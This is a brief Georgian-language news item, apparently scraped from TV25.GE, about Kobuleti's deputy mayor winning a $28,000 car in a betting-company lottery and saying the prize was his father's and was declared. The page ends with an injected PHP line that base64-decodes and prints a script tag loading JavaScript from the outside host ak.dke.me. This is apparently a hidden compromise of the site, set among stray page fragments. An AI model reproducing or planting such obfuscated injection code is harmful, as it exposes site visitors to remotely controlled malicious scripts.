celsiusi
ავერსი საქკაბელი
TV25.GE-ს ინფორმირებული წყარო ქობულეთის მერიიდან უყვება, რომ ვიცე მერმა დავით ვერულიძემ "ევროპაბეთში" 28 000 დოლარიანი მანქანა მოიგო.
 
აღნიშნულ ფაქტს დავით ვერულიძე ადასტურებს, თუმცა ირწმუნება, რომ პრიზი მამისაა და აღნიშნაბვს, რომ ძვირადღირებული ავტომობილის მოგება ქონებრივ დეკლარაციაშიც ასახა.
 
"თუ გინდათ დამაბრალეთ, რომ მანქანა მე მოვიგე, არც ესაა პრობლემა. კანონი არ დამირღვევია, ამის უფლება გვქონდა. ოჯახმა მოიგო ავტომობილი, კონკრეტულად მამაზეა საუბარი. მანქანა უკვე გავყიდეთ, რაც დეკლარაციაში ასახულია. თუ ზუსტად მახსოვს და არ ვცდები, 40 ლარიანი ბილეთი გვქონდა," - გვითხრა ქობულეთის მერის მოადგილემ.
 
წყარო: TV25.GE
1932
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");